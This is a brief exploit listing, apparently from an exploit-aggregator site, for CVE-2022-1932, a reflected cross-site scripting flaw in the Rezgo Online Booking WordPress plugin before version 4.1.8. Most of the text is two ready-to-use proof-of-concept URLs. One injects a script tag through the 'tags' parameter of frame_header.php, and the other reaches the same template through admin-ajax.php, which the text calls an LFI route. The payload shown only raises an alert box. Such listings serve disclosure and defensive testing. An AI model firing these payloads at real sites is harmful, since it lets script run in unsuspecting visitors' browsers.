Exploit for Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting CVE-2022-1932

Name: Exploit for Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting CVE-2022-1932
Rating: 5 (176 reviews)

2022-07-26 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:005C2300-F6BD-416E-97A6-D42284BBB093
Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Via the LFI:

Once the plugin is configured (can use a dummy "Rezgo Company Code" and "Rezgo API Key" in the "Acccount Information" settings section):

http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E